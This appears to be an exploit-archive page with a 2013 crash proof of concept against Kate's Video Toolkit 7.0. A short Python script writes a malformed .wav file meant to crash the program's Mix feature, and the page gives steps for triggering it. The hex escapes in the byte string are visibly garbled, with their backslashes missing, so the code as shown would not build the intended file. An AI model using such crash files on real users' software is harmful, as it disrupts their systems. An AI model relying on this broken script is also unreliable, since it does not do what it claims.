Home / exploitsPDF  

Kate's Video Toolkit 7.0 Crash

Posted on 17 July 2013

# Exploit Title: Kate's Video Toolkit Version 7.0 (.wav) - Crash POC # Date: 14-07-2013 # Exploit Author: ariarat # Vendor Homepage: http://fakewebcam.com/Free-Video-Toolkit.asp # Software Link: http://download.cnet.com/Kate-s-Video-Toolkit/3000-2139_4-10628194.html # Version: 7.0 (maybe all versions!) # Tested on: [ Windows XP sp3] #============================================================================================ # In the Mix section of application : In the left frame add any video file and in right frame # add kateVideoToolkit.wav file and click Mix then select your path and click OK! # # #============================================================================================ # Contact : #------------------ # Web Page : http://ariarat.blogspot.com # Email : mehdi.esmaeelpour@gmail.com #============================================================================================ #!/usr/bin/python junk=("x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01" "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E" "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22" "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00") file = open("kateVideoToolkit.wav" , "w") file.write(junk) file.close()

 

TOP

Malware :